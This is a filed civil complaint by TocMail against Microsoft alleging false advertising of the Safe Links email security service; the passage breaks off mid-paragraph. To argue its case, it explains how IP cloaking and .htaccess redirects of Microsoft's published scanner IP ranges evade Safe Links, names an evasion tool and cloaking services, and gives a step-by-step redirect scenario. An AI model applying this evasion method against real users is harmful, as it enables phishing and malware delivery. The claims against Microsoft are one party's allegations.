Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 1 of 726

**UNITED STATES DISTRICT COURT**
**SOUTHERN DISTRICT OF FLORIDA**

**Civil Action No.:**

TOCMAIL INC, a Florida corporation,

        Plaintiff,

v.

MICROSOFT CORPORATION, a
Washington corporation,

        Defendant.

_____/

**COMPLAINT**

Plaintiff, TOCMAIL INC ("Plaintiff" or "TocMail"), by and through undersigned counsel,

sues Defendant, MICROSOFT CORPORATION ("Defendant" or "Microsoft"), and alleges as

follows:

**NATURE OF ACTION**

1. This is an action for damages in excess of $43 billion, injunctive relief, and

disgorgement of profits under the Lanham Act for harm suffered by Plaintiff and from future harm

Plaintiff will suffer due to Microsoft's dissemination of deceptive promotions of its Safe Links

service.

2. Plaintiff's CEO, who previously sold a prior internet invention for stock from

MicroMuse (which value exceeded $95 million when the stock lockup period expired), currently

offers a patented solution to the most common, most effective cloud-based hacking attack.

However, Plaintiff is hindered from selling its patented solution because Microsoft falsely claims

to have solved this same issue four years ago.

3.     Prior to Plaintiff's patent, cloud security had a flaw that allowed hackers to evade cloud-based scanners virtually 100% of the time. Companies avoided migrating to the cloud because they were duly warned about cloud security's Achilles heel. Without fixing the flaw, Microsoft convinced companies that they could safely move to the cloud, promising its Safe Links service will protect them from cloud security's Achilles heel. However, Microsoft knew that Safe Links did not offer any such protection. In order to procure billions in annual income, Microsoft knowingly made these companies *defenseless* against the very attack it promised protection from. Approximately 100 million professionals currently subscribe to Microsoft's Safe Links service for the express purpose of being protected against the most common, most effective cloud-based attack. Meanwhile, all of them can now be effortlessly (and secretly) hacked at will.

4.     From a technical perspective, Safe Links is a time-of-click redirection service (i.e., it attempts to redirect users to either a warning page or to a safe site each time the user clicks a link). Therefore, 100 million professionals have expressed their desire to subscribe to a time-of-click redirection service that thwarts the most common, most effective cloud-based attack. Plaintiff holds a patent on the only time-of-click redirection service designed to block this attack. Because all 100 million professionals believe that they are already receiving this service from Microsoft, they wrongly perceive Plaintiff's solution as offering no value to them.

5.     Given that no professional would willingly make themselves defenseless against the very attack they are purchasing protection from, the number of customers that Microsoft diverts away from Plaintiff does not require any speculation. Even should Microsoft cease its false advertising, harm to Plaintiff would continue due to Microsoft's retention of customers that it has already deceived. Given that Plaintiff holds a patent on the only time-of-click redirection service immune to this attack, the duration of the continued damage also does not require speculation (the

duration lasting until the patent's expiration on May 7, 2035). Plaintiff loses $2.50 per month per user diverted to Microsoft due to Microsoft's false advertising. This results in $43 billion in damages over the lifetime of the patent. Plaintiff is seeking monetary relief for the full amount of the damages.

6.      Microsoft knowingly and intentionally engages in false advertising. In 2017, a security researcher notified Microsoft in writing of Safe Links' inability to stop the very attack that Microsoft promises Safe Links protects against. The email exchange between Microsoft and this researcher documents that Microsoft has full knowledge of Safe Links' inability to protect against this specific attack. The email exchange further documents that Microsoft does not expect Safe Links to ever be able to protect against this attack, acknowledging that *Safe Links was never designed to do so*. Nevertheless, Microsoft continues to convince companies to move to their cloud by promising Safe Links will protect them against the same attack that it secretly acknowledges Safe Links is unable to protect against. Plaintiff is seeking disgorgement of profits. There is great public interest in making this misconduct unprofitable.  Plaintiff is seeking three times Defendant's profits made as a result of Defendant's wrongful actions or three times Plaintiff's damages, whichever is greater.

7.      Microsoft has also irreparably harmed Plaintiff's reputation and continues to irreparably harm Plaintiff's reputation, by convincing over 100 million professionals that Plaintiff's offering is of no value to them, even though these professionals can be hacked at will and therefore need Plaintiff's cybersecurity service. Plaintiff is seeking injunctive relief.

8.      Microsoft also engages in contributory false advertising, playing a significant role in convincing approximately 1 billion consumers to wrongly believe that the fundamental cloud security weakness was fully solved many years ago. Microsoft, Symantec, Mimecast, ProofPoint,

Sophos, Barracuda, and Vade Secure all openly acknowledge that the cloud security flaw still allows emails with a certain type of malicious link to be delivered to inboxes virtually 100% of the time, regardless of the cloud-based security being used (regardless of blacklists, regardless of artificial intelligence, regardless of machine learning, etc.). All of these companies specifically promote their time-of-click redirection services as effective solutions to the problem, even though all of them contain the exact same design flaw that literally renders them *defenseless*. Microsoft benefits greatly when professionals subscribe to their cloud-based apps (such as Office 365) even when professionals choose a third-party for protection. Microsoft provides various cybersecurity vendors with access to its users' email and data via proprietary protocols. It provides other forms of technology and assistance to other cybersecurity vendors in order to further the perception that it is safe for companies to move to Microsoft's cloud. Consumers en masse have been irrevocably deceived through the reinforcement of false messaging from a myriad of highly trusted security vendors, much to the benefit of Microsoft who significantly enables it.

## THE PARTIES

9.      Plaintiff, TocMail, is a Florida corporation doing business within this District.

10.     Defendant, Microsoft, is a Washington corporation with, upon information and belief, its principal place of business in Redmond, Washington doing business throughout the United States, including within this District.  Microsoft is registered to do business in the State of Florida, and has one of its corporate headquarters located within this District as well.

## JURISDICTION AND VENUE

11.     This is a civil action for damages in excess of $43 billion, disgorgement of profits and injunctive relief for, among other things, false and misleading advertising under 15 U.S.C. §

1125(a)(1)(B). Plaintiff is seeking judgement for three times profits or damages, whichever is greater, pursuant to 15 U.S.C. § 1117(a).

12.    This Court has original jurisdiction over the subject matter of this action pursuant to 28 U.S.C. § 1331 because TocMail's claims arise under federal law, as well as pursuant to 15 U.S.C. § 1121 because TocMail's claims arise under the Lanham Act.

13.    This Court has personal jurisdiction over Microsoft because it is registered to do business in Florida, operates, conducts, engages in and carries on a business in Florida, including within this judicial district, has offices in Florida, and committed a tortious act within Florida, including within this judicial district. Thus, this Court's exercise of personal jurisdiction over Microsoft is consistent with the Constitution of the United States and Fla. Stat. § 48.193.

14.    Venue is proper in the United States District Court for the Southern District of Florida pursuant to at least 28 U.S.C. §§ 1391.

## GENERAL ALLEGATIONS

**A.    TocMail's Security Services.**

15.    Plaintiff's CEO is a software developer with expertise in modern high-level scripting languages, traditional low-level languages, and chip level programming via assembler. He previously invented, and served as the lead programmer of, data communication technology that was sold to MicroMuse for stock, the value of which exceeded $95 million when the stock lockup period expired. He has an established background in creating commercially reliable code for mission critical operations.

16.    In regards to cybersecurity, Plaintiff's CEO is credited with inventing one of the strongest block ciphers in history. His cybersecurity invention is studied in the text book *Advanced*

*Cryptography* by Bruce Schneier. Plaintiff's CEO is also a published cybersecurity expert, and he has been awarded eight cybersecurity patents to date.

17.      As will be discussed in more detail below, Plaintiff's CEO has now solved one of the biggest problems in cloud-based security that previously allowed hackers to implement an attack that was virtually 100% effective.  Plaintiff sells cloud-based security with the solution to such attacks.  However, Microsoft falsely claims that its Safe Links service also defeats this specific attack and has done so for years knowing that such is not the case.

**B.      Inherent Design Weakness in Cloud-Based Security.**

18.      Cloud security has a major flaw that is not present with onsite security.  With onsite security, the scanner and the user's device share the same Internet address (since both devices access the Internet through the same gateway). However, with cloud security, the scanner has a different Internet address than the user's device, allowing hackers to know when their links are being accessed by the security scanner or by a user's device. Hackers simply deliver benign content when the scanner's Internet address connects, and deliver malicious content to everyone else. The scanner approves the link because it only encounters benign content, then the user is harmed by malicious content that the scanner never even knows about. This simple attack is virtually 100% effective against cloud scanners.

19.      When cloaking malicious content is based on Internet addresses (IP addresses), the attack is sometimes referred to as IP cloaking.  As early as 2011, IP cloaking was known to be "the most simple and effective approach." It was known to be "the most effective form of evasion, since it thwarts any sort of detection" by cloud-based security scanners:

> …to evade detection, a simple yet powerful approach is to cloak against scanners by serving malicious content to users but benign content to the detector. While there are many forms of cloaking, in this paper we focus on arguably **the most simple**

**and effective approach: cloaking at the IP level**. To do so, malicious servers simply refuse to return malicious content to requests from certain IP addresses. . . .

**IP Cloaking can be the most effective form of evasion, since it thwarts any sort of detection** by client honeypots or AV engines. For an adversary, IP-based cloaking is simple to deploy and usually requires only small changes to the web server's configuration… At the time of this writing, IP cloaking contributes significantly to the overall number of malicious web sites found by our system. (emphasis added)

*See* "Trends in Circumventing Web-Malware Detection," by Moheeb Abu Rajab, Lucas Ballard, Nav Jagpal, Panayiotis Mavrommatis, Daisuke Nojiri, Niels Provos, Ludwig Schmidt, July, 2011 (excerpt), a true and correct copy of which is attached hereto as **Exhibit "1."**

20.     With IP cloaking, the type of security running on cloud servers does not matter.  IP cloaking renders all security useless because that security only sees good content.  IP cloaking renders artificial intelligence, machine learning, and even blacklists useless by making malicious content invisible to it all.

21.     Prior to Microsoft's false advertising, companies generally knew to keep their scanning onsite to avoid becoming defenseless against this effective security bypass.

22.     Knowledge of IP Cloaking hindered cloud adoption. As will be discussed, Microsoft falsely claimed to have solved this problem in order to convince companies to move their email security to Microsoft's cloud.  Meanwhile, Microsoft knowingly makes these companies defenseless against the very attack it promises protection from. Currently, upon information and belief, approximately 100 million professionals trust Microsoft's promise to protect against this specific attack.

**C.     Microsoft's Advanced Threat Protection and Safe Links.**

**1.     Description Of Advanced Threat Protection and Safe Links.**

23. IP Cloaked links are dynamic (i.e. they deliver different content to different devices). They are the most commonly used form of malicious dynamic links.

24. Microsoft markets, advertises, promotes and sells a cloud-based cybersecurity service called Safe Links ("Safe Links"). Microsoft promotes Safe Links as a solution to malicious dynamic links. Microsoft offers Safe Links within its Advanced Threat Protection ("ATP") service, which operates inside Microsoft's cloud-based Exchange Online Protection ("EOP") servers.

25. Over a four year period, Microsoft engaged in a sustained marketing campaign to falsely promote the narrative that Safe Links solves the cloud security flaw of IP Cloaked links and, therefore, companies can safely move to Microsoft's cloud service. Various examples of Microsoft's deceptive marketing and promotional materials regarding Safe Links are attached as exhibits to this Complaint, including: (a) topmost portion of Microsoft's current website regarding ATP and Safe Links, attached hereto as **Exhibit "2"**; (b) a 2015 Exchange Online Advanced Threat Protection Product Guide, attached hereto as **Exhibit "3"**; (c) an excerpt from Microsoft's 2016 ATP Product Guide, attached hereto as **Exhibit "4"**; (d) an excerpt from Microsoft's Office 365 ProPlus Pitch Deck attached hereto as **Exhibit "5"** and an excerpt from Microsoft's Office 365 ProPlus Mac Pitch Deck, attached hereto as **Exhibit "6"**; (e) an excerpt from Microsoft's current ATP Product Brochure, attached hereto as **Exhibit "7"**; (f) an excerpt from a transcript of Microsoft's 2019 ATP Product Video, the transcript which is produced and distributed by Microsoft, attached hereto as **Exhibit "8"**; (g) excerpt from a 2019 case study regarding ATP, attached hereto as **Exhibit "9"**; (h) an excerpt from a 2019 Enterprise-Class Technology Webpage, attached hereto as **Exhibit "10"**; (i) an excerpt from a 2019 Optimal Security with Minimal Complexity Webpage, attached hereto as **Exhibit "11"**; (j) 2017 Office 365: Everything You

Wanted to Know, attached hereto as **Exhibit "12"**; (k) an excerpt from an ATP Partner Datasheet, attached hereto as **Exhibit "13"**; and (l) a 2019 Microsoft "Exchange Online Business Class Email System" brochure, attached hereto as **Exhibit "14."**

       2.       **Microsoft's Deceptive Message #1: Safe Links Thwarts Malicious Dynamic Links.**

       26.      In a transcript of a 2019 ATP Product Video produced by Microsoft, Microsoft states:

> So let me break this down by starting with the core of all prevention: detection. Now, we invest at least a billion dollars in this area annually. . . . Sophisticated attackers will plan to **ensure links pass through the first round of security filters by making the links benign, only to weaponize them once the message is delivered. Meaning that the destination of that link is altered later to point to a malicious site.** Time is important when **thwarting this type of attack**. 20% of all clicks happen within just five minutes of when an email is received, and with Safe Links, **we're able to protect users right at the point of click** by checking the link for reputation and triggering detonation if necessary.

*See* **Ex. 8** (emphasis added).

       27.      Microsoft is correct that dynamic links bypass Microsoft's first round of security, the same round of security that Microsoft claims to invest a billion dollars in annually.

       28.      However, it is literally false that Safe Links protects users by "thwarting this type of attack."  Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.

       29.      Statements that have an unambiguous meaning, either facially or considered in context, may be classified as literally false.

       30.      Microsoft asserts that an unambiguous service (Safe Links) protects consumers by "thwarting" an unambiguous "type of attack" ("links [that] pass through the first round of security filters by making the links benign, only to weaponize them once the message is delivered. Meaning that the destination of that link is altered later to point to a malicious site").

31.     Microsoft unambiguously states that Safe Links protects users by thwarting the malicious use of dynamic links.

32.     However, it is undisputed that Microsoft knows that Safe Links is *defenseless* against the most common form of malicious dynamic links (IP Cloaked links).  For example, on January 14, 2017, Mikail Tunç ("Tunc") notified Microsoft's Security Response Center (MSRC) that hackers can use IP Cloaked links to bypass Safe Links in its entirety. A true and correct copy of an email chain between Tunc and MSRC is attached hereto as **Exhibit "15"**.  Tunç sent the notification pursuant to Microsoft's bug bounty program.  Tunç holds the following cybersecurity credentials:  ISO/IEC 27001 Lead Auditor, GIAC Web Application Penetration Tester (GWAPT), GIAC Certified Enterprise Defender (GCED), and 650-153-Cisco IronPort Security Associate - Email Security (ESFE).

33.     Specifically, Tunc informed Microsoft that attackers could bypass Safe Links by using the publicly available IP addresses of Microsoft's EOP servers to know whether to deliver benign or malicious content.

34.     On February 24, 2017, Microsoft wrote Tunc: "we have opened a new MSRC case 37595 for this finding and submitted your report for review by our bounty team."  *See* **Ex. 15**. Additionally, MSRC sent Tunç the following link that was entitled "Definition of a Security Vulnerability": https://technet.microsoft.com/library/cc751383.aspx.  A true and correct copy of Microsoft's "Definition of a Security Vulnerability" is attached hereto as **Exhibit "16."** According to that link, Microsoft represented that it only considered inadvertent weaknesses to be bugs, whereas, "by-design weaknesses" do not meet Microsoft's security bug bar.  Specifically, Microsoft stated: "Security vulnerabilities involve inadvertent weaknesses**; by-design weaknesses**

may sometimes occur in a product, but these aren't security vulnerabilities." (emphasis added). *See* **Ex. 16**.

35.     On March 15, 2017, Microsoft notified Tunç that "We have completed our investigation and found that this issue doesn't meet security servicing bug bar… We anticipate no further action on this item from MSRC and will be closing out this case. Thanks, Will MSRC." A true and correct copy of the March 15, 2017 email from Microsoft to Tunc is attached hereto as **Exhibit "17."**

36.     In doing so, Microsoft conceded that Tunç's observation of Safe Link's susceptibility to dynamic links was a "by-design weakness" and not a fixable bug. Microsoft essentially conceded its knowledge that Safe Links is susceptible to such attacks by its very design.

37.     Thus, Microsoft publicly promotes Safe Links as an effective solution to thwarting the malicious use of dynamic links, yet conceded at least to Tunç that Safe Links has a "by-design weakness" that makes it incapable of thwarting the IP Cloaked dynamic links reported by Tunç.

38.     In fact, Microsoft continues to promote Safe Links as the answer to malicious dynamic links nearly three years after Tunç notified Microsoft in writing regarding its ineffectiveness against this very attack.

39.     Up until now, Microsoft has not modified the design of Safe Links to even attempt to address the all-too-common issue of IP Cloaked links. Rather, Microsoft did exactly as they told Tunç by taking "no further action on this item from MSRC" and "closing out this case," thereby further documenting Microsoft's awareness that Safe Link's lack of protection is inherent in its design and not a fixable bug.

40.     It is therefore false for Microsoft to promote Safe Links as a solution to a problem that it was not even designed to address. In the alternative, it is misleading for Microsoft to promote Safe Links as a solution to a problem that it was not even designed to address.

41.     Prior to Microsoft offering its Safe Links service, companies generally knew to keep their security on-site to prevent hackers from using IP-cloaked dynamic links to bypass their blacklists, machine learning and artificial intelligence.  To convince these companies to purchase Microsoft's ATP service, Microsoft has made false statements to them promising to protect against dynamic links.  In fact, Microsoft presents Safe Links' alleged protection against dynamic links as the linchpin of the purchase decision.  Microsoft does so by first admitting that attackers can ensure malicious dynamic links bypass the first multi-billion dollar round of detection, and then offers Safe Links as the answer to this problem.  Given that no company would willingly make itself defenseless against the most common hacking attack, such marketing, advertising and promotion by Microsoft frames Safe Links as the linchpin and cornerstone of the purchasing decision.

42.      In fact, as will be discussed, the industry as a whole presents protection against dynamic links as the linchpin of the purchase decision for email security services. Thus, Microsoft's deceptive advertising is regarding a material quality (if not the most material quality) in terms of the purchase decision.

43.     Moreover, Tunç wrote a blog article confirming how "simple" it is for "an attacker" to elude Safe Links with IP-cloaked dynamic links:

> In this article I will go through my findings and analysis on the Safe Links feature of Microsoft's Office 365 Exchange Online Advanced Threat Protection… an attacker could simply block or re-direct requests from the Exchange Online Protection infrastructure – **yup, it's as simple as that** . . . **Helpfully, Microsoft makes the EOP IP ranges available online so all you need to do is block those ranges on your webserver** . . . .

A true and correct copy of the article, found at: https://emtunc.org/blog/03/2017/bypassing-safe-links-exchange-online-advanced-threat-protection/, is attached hereto as **Exhibit "18"** (emphasis added).

44.    On August 21, 2018, a free software program for automatically bypassing Microsoft's Safe Links was uploaded to Github (a site with over 32 million monthly visitors). This free program is entitled *mkhtaccess_red*. Microsoft's EOP/ATP IP address ranges come preinstalled in *mkhtaccess_red*'s default configuration file.

45.    *Mkhtaccess_red* uses IP cloaking to redirect Microsoft's ATP servers to benign content and to redirect Microsoft's ATP customers to malicious content. Even script kiddies can use *mkhtaccess_red* to evade Microsoft's Safe Links via IP Cloaking.

46.    Microsoft has continued to imply that only "sophisticated attackers" use dynamic links to bypass their billion-dollar first round of detection for more than one year after the free availability of *mkhtaccess_red.*

47.    Microsoft's implication that only "sophisticated attackers" use dynamic links to bypass their billion-dollar first round of detection is misleading.

48.    Apache is one of the most popular webservers. The Apache webserver uses a file called '.htaccess' to redirect listed IP addresses to other sites. *Mkhtaccess_red* inserts Microsoft's IP addresses into the .htaccess file, whereupon the Apache web server redirects Microsoft's scanners to a safe site, making malicious content completely invisible to Microsoft's security service.

49.    In December 2018, almost two years after Tunç notified Microsoft regarding Safe Links' lack of defense, Cryptron Security found that hackers can still bypass Microsoft's Safe Links using .htaccess redirects: "…an attacker could simply block or redirect requests from the

13

Microsoft ATP Safe Links service infrastructure. Microsoft makes the ATP Safe Link IP ranges available online. An attacker needs only to block those IP ranges on the webserver with .htaccess rules." A true and correct copy of the article from Cryptron Security is attached hereto as **Exhibit "19."**

50.     Approximately two months later, in February 2019, Rhino Security Labs also confirmed that hackers can use dynamic links to bypass Microsoft's Safe Links. (See https://rhinosecuritylabs.com/social-engineering/bypassing-email-security-url-scanning/). Rhino Security Labs is a cybersecurity company that has provided security testing for many large companies. The metadata in the Rhino Security webpage indicates that the content was posted on February 19, 2019. A true and correct copy of the article from Rhino Security Labs is attached hereto as **Exhibit "20."**

51.     In August 2019, Tunç performed another test to determine if dynamic links continue to make phishing sites and malware invisible to Microsoft's Safe Links. Tunç's August 2019 report documents that ATP Safe Links continues to be bypassed via IP-Cloaked dynamic links, contrary to Microsoft's public marketing and promotion regarding Safe Links' capabilities - the marketing and promotion that convinced millions to move to the cloud. A true and correct copy of Tunc's August 2019 report is attached hereto as **Exhibit "21."**

52.     In Microsoft's current ATP Product Brochure, Microsoft makes the following claim regarding Safe Links: "Sophisticated attackers will plan to ensure links pass through the first round of security filters. They do this by making the links benign, only to weaponize them after the message is delivered, altering the destination of the links to a malicious site. With Safe Links, we are able to protect users right at the point of click by checking the link for reputation and triggering detonation if necessary." *See* **Ex. 7**.

53.     In both its product video and product brochure, Microsoft clearly markets and promotes Safe Links' promised protection against dynamic links as the linchpin of the purchase decision.  However, Microsoft's promotion, marketing and advertising of Safe Links, including the referenced statement from its current ATP product brochure regarding Safe Links' protection, is literally false.  Alternatively, at a very minimum, Microsoft's promotion, marketing and advertising is misleading, confusing and/or deceiving.

54.     After all, Safe Links is bypassed virtually 100% of the time using the simplest, most commonly used form of dynamic links - IP Cloaking.

55.     Hackers can even use IP Cloaking to send Microsoft customers to sites that are blacklisted by Microsoft's Safe Links. For illustration, consider a hypothetical site that is actively blacklisted by Safe Links: iamhackingyou.com. IP cloaking can be used to secretly send Safe Links' users to the blacklisted site as follows:

    a.     The link in the email points to a non-blacklisted domain with a benign name.

    b.     When Microsoft's security service connects to the link, the link redirects the service to a safe site (such as bankofamerica.com).

    c.     Microsoft's security service approves the link because it only sees good content from a good site.

    d.     Microsoft's security service communicates to its customer's device that it is okay to access the now-approved link.

    e.     When the customer's device accesses the approved link, the link redirects the customer's device to iamhackingyou.com.

    f.     Microsoft's security service is not even aware that its customer was sent to the blacklisted site.

g.      The user does not know that he was sent to a blacklisted site.

h.      Nevertheless, the user is now harmed because Safe Links sent the user to a site that was on its blacklist.

56.     Thus, as shown above, Microsoft's Safe Links' security is easily defeated by dynamic links, the very attack Microsoft promises that Safe Links protects against.

**3.      Deceptive Message #2:  Attackers Redirect to Unsafe Sites via a Forwarding Service After the Message Has Been Received; But with Safe Links, Malicious Links are Dynamically Blocked while Good Links Remain Accessible.**

57.     Microsoft markets, promotes and advertises ATP and Safe Links with the following statement:

> …attackers **sometimes try to hide malicious URLs within seemingly safe links that are redirected to unsafe sites** *by a forwarding service* after the message has been received. The ATP Safe Links feature proactively protects your users if they click such a link. That protection remains every time they click the link, so malicious links are dynamically blocked while good links can be accessed. (emphasis added)

*See* 2015 ATP Product Guide (**Ex. 3**), 2016 ATP Product Guide (**Ex. 4**), 2017 Office 365: Everything You Wanted to Know (**Ex. 12**), and 2019 ATP Partner Datasheet (**Ex. 13**) (emphasis added).

58.     Microsoft has been delivering this message for four years from the launch of ATP in 2015 (**Ex. 3**), 2016 (**Ex. 4**), 2017 (**Ex. 12**), up to the present (**Ex. 13**).  Specifically, for four years, Microsoft has promised Safe Links' protection against dynamic links whose malicious content is cloaked "by a forwarding service."

59.     At the time Microsoft launched its ATP offering, IP-Cloaked forwarding services were "widely used by attackers to 'cut the attack chain' in the face of a security scanner."  For example, ProofPoint's 2014 Analysis of a Cybercrime Infrastructure provides:

In order to avoid detection, **it is *common practice* for attackers to add a layer of redirection, known as a Traffic Distribution Service (TDS).** Originally used to route web traffic, TDS's have been *widely used* by attackers as a means to "cut the attack chain" in the face of a security scanner.

**The TDS will only lead visiting browsers into loading exploits if it has verified that the client is neither a crawler nor a security scanner**, and that an exploit is indeed available for the visiting browser. **This technique is sometimes referred to as "cloaking"; since the visiting IP address plays a significant role in this decision process, it can also [be] referred to as "*IP cloaking*."**

**Today, cybercrime groups often offer TDS's as a service. . . . From March 4 to the present, they switched to using Sutra TDS, which is a powerful TDS that has been *popular* among cybercrime groups in order to cloak IP addresses and circumvent detection** (Screenshot 8).

A true and correct copy of Analysis of a Cybercrime Infrastructure by Proofpoint Researchers is attached hereto as **Exhibit "22."** (emphasis added).

60.     Currently, hackers continue using IP-Cloaked forwarding services to redirect "to unsafe sites" "after the message has been received." Current examples include justcloakit.com and cloakerly.com.

61.     IP Cloaking is the most commonly used tactic of malicious users of forwarding services.

62.     To unambiguously promise that Safe Links protects against dynamic links in the context of forwarding services is literally false.  Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.

63.     Microsoft's promotion also contains a categorical promise of protection. Specifically, Microsoft promises protection every time a user clicks a link so that [category 1] malicious links are dynamically blocked while [category 2] good links can be accessed. Microsoft's promotion promises specific outcomes based on two categories: malicious links vs. good links.

64.     By presenting the protection categorically, Microsoft is promising that all malicious links are dynamically blocked while all good links can be accessed.

65.     Microsoft makes these categorical assertions within the context of an industry in which, as will be explained below, other vendors make absolute guarantees regarding the effectiveness of time-of-click redirection in regards to malicious dynamic links. Therefore, in context, Microsoft is indeed making the literal categorical assertion that all malicious links are dynamically blocked while all good links can be accessed.

66.     This categorical assertion of Safe Links' protection is literally false.  Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.

67.     Alternatively, this categorical assertion within the context of forwarding services is literally false. Alternatively, at a very minimum, this categorical assertion within the context of forwarding services is misleading, confusing, and/or deceiving.

**4.      Deceptive Message #3:  You Don't Need Any Other Security Products. With ATP You're Covered.**

68.     Microsoft's primary promotional webpage for its Advanced Threat Protection service is located at https://products.office.com/en-us/exchange/advance-threat-protection. See excerpt of topmost portion (**Ex. 2**).

69.     Microsoft uses the URL in the above paragraph for commercial advertisement of ATP, as evidenced by, among other things:

    a.      a "Plans & pricing" menu option at the top menu;

    b.      a "Buy Office 365" button also in the top menu;

    c.      a "SEE PLANS AND PRICING" button in the topmost content area;

    d.      On August 13, 2019, an analysis conducted on this URL revealed that 229 different domains contain a total of 1,045 links pointing to this URL. An excerpt of this

backlink analysis is included as **Exhibit "23."** This analysis documents that domains with millions of visitors per month use this specific URL to direct their visitors for the promotion of ATP. For example:

       i.     BleepingComputer.com says "Millions of visitors come to BleepingComputer.com every month to learn about the latest security threats, technology news, ways to stay protected online, and how to use their computer more efficiently." Bleepingcomputer.com connects prospective customers for "Office 365 ATP" to this specific URL.

       ii.     TechRepublic.com has 36.7 million unique visitors monthly, and it connects prospective customers for "Office 365 Advanced Threat Protection" to this specific URL. *See* **Ex. 23**; and

       iii.     On August 9, 2019, a Google search was conducted using the following: purchase Microsoft advanced threat protection. This URL is the first result returned in the search (excluding advertisements). A true and correct copy of the Google search result is attached hereto as **Exhibit "24."**.

70.     The webpage located at the subject URL ties together the ATP Product Brochure (**Ex. 7**), and the Office 365 ATP Case Study (**Ex. 9**).

71.     Only one case study is referenced by Microsoft on its primary promotional ATP webpage, which is titled "Office 365 ATP case study." A true and correct copy of such case study is attached hereto as **Exhibit "25."** This case study includes the following quote: "We no longer have to worry about what security product we'll use. With Microsoft 365 we're covered."

72.     Though the quote was originally supplied by a customer, Microsoft

a.  Made the letters of the quote larger than the letters used in the body of the case study;

b.  Put a space before and after the quote to isolate it from the body;

c.  Used a different color to draw attention to the quote;

d.  Used this quote as the first callout in the case study;

e.  Chose this to be the sole case study on the ATP promotional page; and

f.  Uses this same quote, in isolation, on other promotional webpages including Microsoft's Enterprise-Class Technology webpage (**Ex. 10**) and Microsoft's Optimize Security with Minimal Complexity webpage (**Ex. 11**).

73.  Through the above actions, Microsoft promotes the message that no other security products are needed because, with Microsoft's ATP security, companies are covered.

74.  Microsoft's promotional message that Microsoft's ATP security is all that is needed is literally false.  Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.

75.  Additional documentation regarding Microsoft's promoting the message that its security is all a company needs is identified below.

**5.  Deceptive Message #4:  Safe Links.**

76.  The very name "Safe Links" conveys that Microsoft's security service makes links "safe."

77.  Microsoft promotes the name "Safe Links" as a service that *guarantees* hyperlinks are harmless: i.e., "ensure hyperlinks in documents are harmless with ATP Safe Links." *See* **Exs. 5, 6 and 14**.  In this repeated messaging, Microsoft equates the name "Safe Links" with "ensure hyperlinks in documents are harmless."

78.  The word "ensure" means "to make certain; to guarantee."

79. As will be explained below, other popular cybersecurity vendors falsely portray time-of-click redirection as "ensuring" safety so that users "never" visit malicious sites. Thus, within the context of the industry as a whole, Microsoft's prospective customers would understand Microsoft to be guaranteeing safety through its use of the word "ensure."

80. Given Safe Links' by-design inability to thwart the most commonly used cloud attack (IP Cloaked dynamic links), it is literally false to convey the message "Safe Links." Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.

81. A product name violates the Lanham Act when the name misrepresents a material quality of the product, most especially when the defendant has been engaged in deceptive advertising regarding that material quality.

82. Here, Microsoft has been engaged in a highly successful deceptive advertising campaign regarding the core quality of 'safety' in its Safe Links service. This false advertising regarding the material quality of safety has produced a false association between the name "Safe Links" and the false claims of safety. In the alternative, this misleading advertising regarding the material quality of safety has produced a misleading, confusing and/or deceiving association between the name "Safe Links" and the false claims of safety.

83. Deceptive advertising regarding the safety of an offering is not a matter of mere puffery. Rather, it is a traditional claim of consumer misrepresentation.

84. In regards to cybersecurity products and services, the quality of safety is not just a material quality. Rather, it is the core quality that consumers consider when making a purchase decision. Therefore, any misrepresentation of the safety of a cybersecurity product or service is a misrepresentation of a material quality of that product or service.

6.      **False Message #5: Safe Links Ensures Hyperlinks in Documents are Harmless.**

85.      Microsoft created power point presentations that are to be used for the marketing and promotion of ATP.   See reduced images from slides of PowerPoint presentations of Microsoft's Office 365 ProPlus Pitch Deck attached as **Ex. 5** and Microsoft's Office 365 ProPlus Mac Pitch Deck attached as **Ex. 6**.  All slides are intended to be shown to customers except for slide 1.  Slide 1 indicates that these PowerPoint presentations are to be used when presenting to Business Decision Makers, Technology Decision Makers, and IT Decision Makers ("Audience: BDM, TDM, ITDM"), the "CORE content" is "slides 2-28," the presentations contain "approved messaging," and "Messages and wording have been reviewed by stakeholders."

86.      In the "CORE content" of the power point presentations, Microsoft provides approved messaging to promote and market to decision makers that its security "ensure[s] hyperlinks in documents are harmless with ATP Safe Links."   *See* **Ex. 5**, p. 22; **Ex. 6**, p. 20.  Microsoft also makes nearly the identical representation in its 2019 "Exchange Online Business Class Email System" brochure.  *See* **Ex. 14** ("Ensure document hyperlinks are harmless with ATP Safe Links.").

87.      However, the statement that Safe Links *ensures* hyperlinks in documents are harmless is literally false.  Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.  As discussed in detail above, Safe Links can be easily bypassed by IP cloaking and, thus, Safe Links does not *ensure* that hyperlinks are harmless.

88.      Both PowerPoint presentations attached as **Exs. 5 and 6** were finalized more than 9 months after Tunç notified Microsoft of Safe Links' susceptibility to IP-Cloaked Dynamic Links.

89.      A Google search result demonstrates that both PowerPoint presentations were publicly retrievable from the following site: https://o365pp.blob.core.windows.net. Azure's cloud

storage system uses the following URL convention: https://*mystorageaccount*.blob.core.windows.net. Thus, the Pitch Decks were uploaded by the owner of the Azure cloud storage account entitled 'o365pp.' The owner of 'o365pp' entitled the file name "Office 365 ProPlus Overview for Decision Makers Speaker Notes.docx." A true and correct copy of the Google search result is attached hereto as **Exhibit "26."**

90.     Another Google search result demonstrates that the PowerPoint presentations were not accessible to the general public on August 11, 2019. A true and correct copy of the subsequent Google search result is attached hereto as **Exhibit "27."**

**7.    Consumer Surveys, Market Research and Case Studies.**

91.     No evidence of deception is necessary to satisfy any of the allegations of literally false representations. Consumer surveys, market research, expert testimony, or other evidence can be used to support allegations of misleading, confusing and deceiving representations.

92.     Consumer surveys document that Microsoft's deceptive promotion of its Advanced Threat Protection service (including Safe Links) have misled purchasers regarding its security capabilities.

93.     Market Research reports document that Microsoft's deceptive promotion of its Advanced Threat Protection service (including Safe Links) have misled purchasers regarding its security capabilities.

94.     Case Studies document that Microsoft's deceptive promotion of its Advanced Threat Protection service (including Safe Links) have misled purchasers regarding its security capabilities.

95.     In 2015, IP Cloaking was the most commonly used method for consistently bypassing cloud-based security. In "Next Generation Of Exploit Kit Detection By Building

